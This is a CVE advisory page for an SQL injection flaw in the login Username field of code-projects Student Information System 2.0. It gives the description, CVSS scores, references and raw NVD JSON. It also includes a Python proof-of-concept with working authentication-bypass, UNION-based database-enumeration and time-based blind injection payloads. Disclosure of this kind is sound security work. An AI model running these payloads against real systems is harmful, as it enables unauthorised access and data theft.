CVE-2025-13241

Description

A flaw has been found in code-projects Student Information System 2.0. This vulnerability affects unknown code of the file /index.php. Executing manipulation of the argument Username can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:student_information_system:2.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Student Information System 2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13241 SQL Injection PoC
# Target: code-projects Student Information System 2.0
# Vulnerability: SQL Injection in /index.php Username parameter

def exploit_sqli(target_url):
    """
    SQL Injection exploit for CVE-2025-13241
    This PoC demonstrates database information extraction
    """
    target = target_url.rstrip('/') + '/index.php'
    
    # Basic authentication bypass payload
    payload_basic = "' OR '1'='1"
    
    # Database enumeration payload (MySQL)
    payload_db_info = "' UNION SELECT NULL,version(),user(),database()-- -"
    
    # Blind boolean injection for data extraction
    payload_blind = "' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)-- -"
    
    print(f"[*] Targeting: {target}")
    print(f"[*] Vulnerability: SQL Injection in Username parameter")
    
    # Test 1: Basic authentication bypass
    print("\n[+] Test 1: Testing authentication bypass...")
    data = {
        'Username': payload_basic,
        'Password': 'any'
    }
    try:
        response = requests.post(target, data=data, timeout=10)
        if 'dashboard' in response.text.lower() or response.status_code == 302:
            print("[+] Authentication bypass successful!")
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
    
    # Test 2: Database enumeration
    print("\n[+] Test 2: Extracting database information...")
    data = {
        'Username': payload_db_info,
        'Password': 'any'
    }
    try:
        response = requests.post(target, data=data, timeout=10)
        if 'root@' in response.text or 'mysql' in response.text.lower():
            print("[+] Database info leaked in response!")
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
    
    print("\n[*] Exploitation complete. Check responses for data leakage.")

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://vulnerable-site.com")
        sys.exit(1)
    exploit_sqli(sys.argv[1])

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13241
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13241
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13241/
[4] VulDB https://vuldb.com/cve/CVE-2025-13241
[5] https://code-projects.org/
[6] https://github.com/asd1238525/cve/blob/main/SQL13.md
[7] https://vuldb.com/?ctiid.332567
[8] https://vuldb.com/?id.332567
[9] https://vuldb.com/?submit.687526

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13241", "sourceIdentifier": "[email protected]", "published": "2025-11-16T07:15:46.340", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in code-projects Student Information System 2.0. This vulnerability affects unknown code of the file /index.php. Executing manipulation of the argument Username can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:student_information_system:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "0D434445-9D99-4366-A2BE-D2420F5855C2"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/asd1238525/cve/blob/main/SQL13.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332567", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332567", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.687526", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}